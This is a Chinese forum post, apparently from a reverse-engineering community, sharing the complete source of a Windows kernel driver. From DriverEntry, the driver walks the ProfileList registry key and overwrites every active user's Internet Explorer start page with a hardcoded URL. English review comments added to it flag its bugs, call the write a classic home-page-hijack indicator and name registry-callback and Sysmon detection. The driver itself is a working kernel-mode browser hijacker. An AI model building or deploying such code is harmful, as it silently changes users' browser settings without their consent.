白菜写了个驱动探测注册表当前用户，改了一下主页。
高手飘过。有写的不对的地方请赐教!
新手大家一起讨论!(代码和sys都在附件中)
(源代码)
改主页:
#include "Driver.h"
#pragma INITCODE
/**
 * Write the Internet Explorer "Start Page" value under the per-user
 * IE\Main key whose full native registry path is passed in `main`.
 *
 * @param main  Absolute path of the form
 *              \Registry\User\<SID>\Software\Microsoft\Internet Explorer\Main\
 *              as built by EnumerateCurrentUser. Passed by value, so the
 *              descriptor is copied but the character buffer is shared
 *              with the caller.
 *
 * Review notes (risk):
 *  - A ZwOpenKey failure is only logged; hRegister is then left
 *    uninitialized yet still handed to ZwSetValueKey and ZwClose below.
 *    The function should return on !NT_SUCCESS(ntstatus).
 *  - KEY_ALL_ACCESS is wider than the KEY_SET_VALUE this function needs.
 *  - The ZwSetValueKey status is never inspected.
 *  - A kernel-mode write to HKU\<SID>\...\Internet Explorer\Main\Start Page
 *    is a classic home-page-hijack indicator; a CmRegisterCallback registry
 *    filter or Sysmon registry-event logging would surface this write.
 */
VOID changeStartPage(UNICODE_STRING main)
{
    HANDLE hRegister;
    OBJECT_ATTRIBUTES objectAttributes;
    // Case-insensitive open of the absolute path in `main`; no root directory handle.
    InitializeObjectAttributes(&objectAttributes,
                               &main,
                               OBJ_CASE_INSENSITIVE,
                               NULL,
                               NULL);
    NTSTATUS ntstatus = ZwOpenKey(&hRegister,
                                  KEY_ALL_ACCESS,
                                  &objectAttributes);
    if(NT_SUCCESS(ntstatus))
    {
        KdPrint(("Open register successfully\n"));
    }
    // NOTE(review): no else/return above -- execution falls through with an
    // unset handle when the open failed.
    UNICODE_STRING ValueName;
    RtlInitUnicodeString(&ValueName,L"Start Page");
    WCHAR* strValue=L"http://www.kanxue.com";
    // REG_SZ data length is in bytes and must include the terminating
    // NUL, hence wcslen()*sizeof(WCHAR) + 2.
    ZwSetValueKey(hRegister,
                  &ValueName,
                  0,
                  REG_SZ,
                  strValue,
                  wcslen(strValue)*2+2);
    ZwClose(hRegister);
}
枚举当前用户
#pragma INITCODE
/**
 * Walk HKLM\...\ProfileList, and for every profile subkey whose RefCount
 * DWORD is non-zero, build the matching \Registry\User\<SID>\ path, append
 * the IE Main subpath and call changeStartPage() on it.
 *
 * The two 256-WCHAR stack buffers (CurrentUserbuf / ProfileListbuf) act as
 * growable strings: they are seeded with the fixed prefixes, appended to
 * per subkey, and reset to the prefix at the end of each iteration.
 *
 * Review notes (risk / correctness):
 *  - ZwOpenKey failure is only logged; hRegister is uninitialized afterwards
 *    but still used by every ZwQueryKey/ZwEnumerateKey call and ZwClose.
 *  - The status of every ZwQueryKey / ZwEnumerateKey call is ignored, and
 *    ulSize is declared without an initializer, so a failed size probe
 *    feeds an indeterminate size into ExAllocatePool.
 *  - ExAllocatePool results are dereferenced without a NULL check
 *    (pfi->SubKeys, pbi->NameLength); ExAllocatePoolWithTag is the
 *    expected API for tagged, attributable allocations.
 *  - uQueryValue is never reset between iterations and the status of
 *    RtlQueryRegistryValues is not checked, so a failed query for one
 *    subkey can reuse the RefCount read for the previous one.
 *  - (USHORT)pbi->NameLength truncates a ULONG.
 *  - RtlAppendUnicodeStringToString is bounded by MaximumLength but its
 *    STATUS_BUFFER_TOO_SMALL result is ignored, so a long name silently
 *    truncates the path. RegProfileList.Buffer is then passed to
 *    RtlQueryRegistryValues as a NUL-terminated path; that relies on the
 *    Rtl append leaving room for and writing the terminator -- confirm.
 *  - Kernel-mode enumeration of ProfileList followed by writes under
 *    HKU\<SID> is an observable hijack pattern (registry callback / ETW).
 */
VOID EnumerateCurrentUser()
{
    UNICODE_STRING RegCurrentUser,RegUser,main;
    UNICODE_STRING RegProfileList,RegProf;
    WCHAR CurrentUserbuf[256];
    WCHAR ProfileListbuf[256];
    RtlInitUnicodeString(&RegProf,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\");
    RtlInitUnicodeString(&RegUser,L"\\Registry\\User\\");
    RtlInitUnicodeString(&main,L"\\Software\\Microsoft\\Internet Explorer\\Main\\");
    // Empty counted strings backed by the stack buffers; MaximumLength is in bytes.
    RtlInitEmptyUnicodeString(&RegCurrentUser,CurrentUserbuf,256*sizeof(WCHAR));
    RtlInitEmptyUnicodeString(&RegProfileList,ProfileListbuf,256*sizeof(WCHAR));
    RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
    RtlCopyUnicodeString(&RegProfileList,&RegProf);
    // One-entry query table; the zeroed second entry is the terminator.
    // RTL_QUERY_REGISTRY_DIRECT stores the DWORD straight into uQueryValue,
    // defaulting to 0 when the value is absent.
    RTL_QUERY_REGISTRY_TABLE paramTable[2];
    ULONG udefaultData=0;
    ULONG uQueryValue;   // NOTE(review): not reset per iteration (see header).
    RtlZeroMemory(paramTable,sizeof(paramTable));
    paramTable[0].Flags=RTL_QUERY_REGISTRY_DIRECT;
    paramTable[0].Name=L"RefCount";
    paramTable[0].EntryContext=&uQueryValue;
    paramTable[0].DefaultType=REG_DWORD;
    paramTable[0].DefaultData=&udefaultData;
    paramTable[0].DefaultLength=sizeof(ULONG);
    HANDLE hRegister;
    OBJECT_ATTRIBUTES objectAttributes;
    InitializeObjectAttributes(&objectAttributes,
                               &RegProf,
                               OBJ_CASE_INSENSITIVE,
                               NULL,
                               NULL);
    // KEY_ALL_ACCESS is requested although only enumeration/read is performed here.
    NTSTATUS ntStatus = ZwOpenKey(&hRegister,
                                  KEY_ALL_ACCESS,
                                  &objectAttributes);
    if(NT_SUCCESS(ntStatus))
    {
        KdPrint(("Open register successfully\n"));
    }
    // NOTE(review): falls through with an unset handle when the open failed.
    ULONG ulSize;
    // Size probe, then the real query, to learn the subkey count.
    ZwQueryKey(hRegister,
               KeyFullInformation,
               NULL,
               0,
               &ulSize);
    PKEY_FULL_INFORMATION pfi =
        (PKEY_FULL_INFORMATION)
        ExAllocatePool(PagedPool,ulSize);
    ZwQueryKey(hRegister,
               KeyFullInformation,
               pfi,
               ulSize,
               &ulSize);
    for(ULONG i=0;i<pfi->SubKeys;i++)
    {
        // Same probe-then-fetch pattern for the i-th subkey's name.
        ZwEnumerateKey(hRegister,
                       i,
                       KeyBasicInformation,
                       NULL,
                       0,
                       &ulSize);
        PKEY_BASIC_INFORMATION pbi =
            (PKEY_BASIC_INFORMATION)
            ExAllocatePool(PagedPool,ulSize);
        ZwEnumerateKey(hRegister,
                       i,
                       KeyBasicInformation,
                       pbi,
                       ulSize,
                       &ulSize);
        // Wrap the non-terminated name in a counted string without copying it.
        UNICODE_STRING uniKeyName;
        uniKeyName.Length =
            uniKeyName.MaximumLength =
            (USHORT)pbi->NameLength;
        uniKeyName.Buffer = pbi->Name;
        // Length is in bytes, so this keeps names longer than 10 WCHARs --
        // presumably to skip the short well-known-SID subkeys; confirm.
        if(uniKeyName.Length>20)
        {
            RtlAppendUnicodeStringToString(&RegCurrentUser,&uniKeyName);
            RtlAppendUnicodeStringToString(&RegProfileList,&uniKeyName);
            // KdPrint(("The %d sub item name:%wZ\n",i,&uniKeyName));
            // KdPrint(("The %d sub item name:%wZ\n",i,&RegProfileList));
            // KdPrint(("The %d sub item name:%wZ\n",i,&RegCurrentUser));
            // Absolute-path query of ProfileList\<SID>\RefCount into uQueryValue.
            RtlQueryRegistryValues(RTL_REGISTRY_ABSOLUTE,RegProfileList.Buffer,paramTable,NULL,NULL);
            // A non-zero RefCount is treated as "this profile is in use";
            // that interpretation is the author's heuristic, not verified here.
            if (uQueryValue>0)
            {
                KdPrint(("HKET_CURRENT_USER: %wZ\n",&RegCurrentUser));
                RtlAppendUnicodeStringToString(&RegCurrentUser,&main);
                KdPrint(("HKET_CURRENT_USER_main: %wZ\n",&RegCurrentUser));
                changeStartPage(RegCurrentUser);
            }
        }
        // Reset both working strings to their prefixes for the next subkey.
        RtlCopyUnicodeString(&RegCurrentUser,&RegUser);
        RtlCopyUnicodeString(&RegProfileList,&RegProf);
        ExFreePool(pbi);
    }
    ExFreePool(pfi);
    ZwClose(hRegister);
}
main
#pragma INITCODE
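/**
 * Driver entry point: installs the unload and dispatch routines, creates the
 * device object, and only then runs the registry enumeration.
 *
 * @param pDriverObject  Driver object supplied by the I/O manager.
 * @param pRegistryPath  Driver service key path; unused here.
 * @return Status of CreateDevice(); STATUS_SUCCESS on success.
 *
 * Fix: the original called EnumerateCurrentUser() even when CreateDevice()
 * had failed, so the registry was modified by a driver whose load was about
 * to be rejected. The enumeration now runs only after the device exists.
 */
extern "C" NTSTATUS DriverEntry (
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath )
{
    UNREFERENCED_PARAMETER(pRegistryPath);
    KdPrint(("Enter DriverEntry\n"));
    pDriverObject->DriverUnload = HelloDDKUnload;
    // One no-op dispatch routine serves every supported major function.
    pDriverObject->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
    pDriverObject->MajorFunction[IRP_MJ_CLOSE] = HelloDDKDispatchRoutine;
    pDriverObject->MajorFunction[IRP_MJ_WRITE] = HelloDDKDispatchRoutine;
    pDriverObject->MajorFunction[IRP_MJ_READ] = HelloDDKDispatchRoutine;
    NTSTATUS status = CreateDevice(pDriverObject);
    if (!NT_SUCCESS(status))
    {
        // Device creation failed: report it without touching the registry.
        KdPrint(("DriverEntry end\n"));
        return status;
    }
    EnumerateCurrentUser();
    KdPrint(("DriverEntry end\n"));
    return status;
}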
#pragma INITCODE
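/**
 * Create the driver's single exclusive, buffered-I/O device object
 * (\Device\MyDDKDevice) and its user-mode symbolic link (\??\HelloDDK).
 *
 * @param pDriverObject  Driver object the device is attached to.
 * @return STATUS_SUCCESS, or the failing status from IoCreateDevice /
 *         IoCreateSymbolicLink. On a symbolic-link failure the device
 *         object created earlier is deleted again, so nothing leaks.
 *
 * Fix: the original passed `&(UNICODE_STRING)devName` to IoCreateDevice,
 * the address of a cast temporary; `&devName` is what is meant.
 */
NTSTATUS CreateDevice (
IN PDRIVER_OBJECT pDriverObject)
{
    UNICODE_STRING devName;
    RtlInitUnicodeString(&devName,L"\\Device\\MyDDKDevice");
    PDEVICE_OBJECT pDevObj = NULL;
    NTSTATUS status = IoCreateDevice(pDriverObject,
                                     sizeof(DEVICE_EXTENSION),
                                     &devName,
                                     FILE_DEVICE_UNKNOWN,
                                     0, TRUE,          // exclusive device
                                     &pDevObj);
    if (!NT_SUCCESS(status))
    {
        return status;
    }
    pDevObj->Flags |= DO_BUFFERED_IO;
    PDEVICE_EXTENSION pDevExt = (PDEVICE_EXTENSION)pDevObj->DeviceExtension;
    pDevExt->pDevice = pDevObj;
    // Both names are initialised from string literals, so copying the
    // UNICODE_STRING descriptors into the extension is sufficient.
    pDevExt->ustrDeviceName = devName;
    UNICODE_STRING symLinkName;
    RtlInitUnicodeString(&symLinkName,L"\\??\\HelloDDK");
    pDevExt->ustrSymLinkName = symLinkName;
    status = IoCreateSymbolicLink(&symLinkName,&devName);
    if (!NT_SUCCESS(status))
    {
        // Undo the device creation so the driver does not leave a half-built device.
        IoDeleteDevice(pDevObj);
        return status;
    }
    return STATUS_SUCCESS;
}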
#pragma PAGEDCODE
/**
 * Unload routine: for every device object owned by the driver, remove its
 * symbolic link and then delete the device itself.
 *
 * @param pDriverObject  Driver object being unloaded.
 *
 * The next-device pointer is read before IoDeleteDevice() so the list walk
 * never touches a device that has already been freed.
 */
VOID HelloDDKUnload (IN PDRIVER_OBJECT pDriverObject)
{
    KdPrint(("Enter DriverUnload\n"));
    for (PDEVICE_OBJECT pCur = pDriverObject->DeviceObject; pCur != NULL; )
    {
        PDEVICE_EXTENSION pExt = (PDEVICE_EXTENSION)pCur->DeviceExtension;
        UNICODE_STRING linkName = pExt->ustrSymLinkName;
        IoDeleteSymbolicLink(&linkName);
        pCur = pCur->NextDevice;
        IoDeleteDevice(pExt->pDevice);
    }
}
#pragma PAGEDCODE
/**
 * Generic dispatch routine for create/close/read/write: completes every IRP
 * immediately with STATUS_SUCCESS and zero bytes transferred.
 *
 * @param pDevObj  Target device object (unused).
 * @param pIrp     Request to complete.
 * @return STATUS_SUCCESS.
 */
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
    KdPrint(("Enter HelloDDKDispatchRoutine\n"));
    pIrp->IoStatus.Status = STATUS_SUCCESS;
    pIrp->IoStatus.Information = 0;   // no data transferred
    IoCompleteRequest(pIrp, IO_NO_INCREMENT);
    KdPrint(("Leave HelloDDKDispatchRoutine\n"));
    return STATUS_SUCCESS;
}
inhell.rar